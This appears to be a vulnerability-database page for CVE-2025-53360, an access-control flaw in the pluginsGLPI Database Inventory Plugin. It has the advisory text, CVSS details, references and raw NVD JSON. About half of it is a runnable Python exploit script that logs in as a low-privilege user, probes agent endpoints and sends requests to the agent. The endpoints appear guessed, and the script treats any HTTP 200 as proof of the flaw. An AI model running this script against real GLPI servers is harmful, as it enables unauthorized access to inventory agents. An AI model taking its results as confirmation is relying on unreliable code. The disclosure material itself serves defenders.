Security Vulnerability Report
CVE-2025-53360 CVSS 4.3 MEDIUM

Published: 2025-11-18 17:16:03
Last Modified: 2026-04-15 00:35:42

Description

pluginsGLPI's Database Inventory Plugin "manages" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. In versions prior to 1.0.3, any authenticated user could send requests to agents. This issue has been patched in version 1.0.3.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

pluginsGLPI Database Inventory Plugin < 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-53360 PoC - pluginsGLPI Database Inventory Plugin Unauthorized Agent Access
# Target: pluginsGLPI with Database Inventory Plugin < 1.0.3


def exploit_cve_2025_53360(target_url, username, password):
    """
    This PoC demonstrates the authentication bypass vulnerability in
    pluginsGLPI Database Inventory Plugin. Any authenticated user can send
    requests to agents without proper authorization checks.
    """
    session = requests.Session()

    # Step 1: Login to GLPI with low-privilege user
    login_url = f"{target_url}/front/login.php"
    login_data = {
        'username': username,
        'password': password,
        'auth': 'local',
        'submit': 'Login'
    }

    try:
        response = session.post(login_url, data=login_data, timeout=10)
        # Treat either a non-200 status or a page without the GLPI marker as a failed login
        if 'GLPI' not in response.text or response.status_code != 200:
            print("[-] Login failed")
            return False
        print("[+] Successfully authenticated as low-privilege user")

        # Step 2: Access agent management endpoint (unauthorized)
        # This should be restricted but isn't in vulnerable versions
        agent_endpoints = [
            '/ajax/plugin.databaseinventory.php',
            '/front/plugin.databaseinventory.agent.php',
            '/api/plugin/databaseinventory/agent/'
        ]

        for endpoint in agent_endpoints:
            url = f"{target_url}{endpoint}"
            try:
                response = session.get(url, timeout=10)
                # Check if we can access agent data without proper permissions
                if response.status_code == 200:
                    print(f"[+] Successfully accessed {endpoint}")
                    print("[+] Response indicates unauthorized access possible")
                    print(f"[+] Status Code: {response.status_code}")
            except requests.RequestException as e:
                print(f"[-] Request to {endpoint} failed: {e}")

        # Step 3: Send malicious request to agent
        malicious_url = f"{target_url}/ajax/plugin.databaseinventory.php"
        payload = {
            'action': 'getAgentStatus',
            'agent_id': '1'
        }
        response = session.post(malicious_url, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Malicious request accepted by vulnerable endpoint")
            print("[+] Vulnerability confirmed - unauthorized agent access possible")
            return True
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

    # Reached when the agent endpoint did not accept the request
    return False


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://localhost/glpi user pass")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]

    print("[*] CVE-2025-53360 PoC - pluginsGLPI Database Inventory Plugin")
    print("[*] Vulnerability: Improper Authorization in Agent Management")
    print("-" * 60)

    exploit_cve_2025_53360(target, user, passwd)
```

References

- https://github.com/pluginsGLPI/databaseinventory/commit/0a376a0c6f4142e11ea518faefe95c01b176fd87
- https://github.com/pluginsGLPI/databaseinventory/commit/7dcad1efb6ee84e9cffb3b446cdb47dc0be1091e
- https://github.com/pluginsGLPI/databaseinventory/commit/e9d4474acdab4141a6f4798cdd406b0d04480269
- https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-5j5j-xr62-jr58

Weakness: CWE-284 (Improper Access Control)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-53360",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T17:16:02.807",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "pluginsGLPI's Database Inventory Plugin \"manages\" the Teclib' inventory agents in order to perform an inventory of the databases present on the workstation. In versions prior to 1.0.3, any authenticated user could send requests to agents. This issue has been patched in version 1.0.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/pluginsGLPI/databaseinventory/commit/0a376a0c6f4142e11ea518faefe95c01b176fd87", "source": "[email protected]"},
      {"url": "https://github.com/pluginsGLPI/databaseinventory/commit/7dcad1efb6ee84e9cffb3b446cdb47dc0be1091e", "source": "[email protected]"},
      {"url": "https://github.com/pluginsGLPI/databaseinventory/commit/e9d4474acdab4141a6f4798cdd406b0d04480269", "source": "[email protected]"},
      {"url": "https://github.com/pluginsGLPI/databaseinventory/security/advisories/GHSA-5j5j-xr62-jr58", "source": "[email protected]"}
    ]
  }
}
```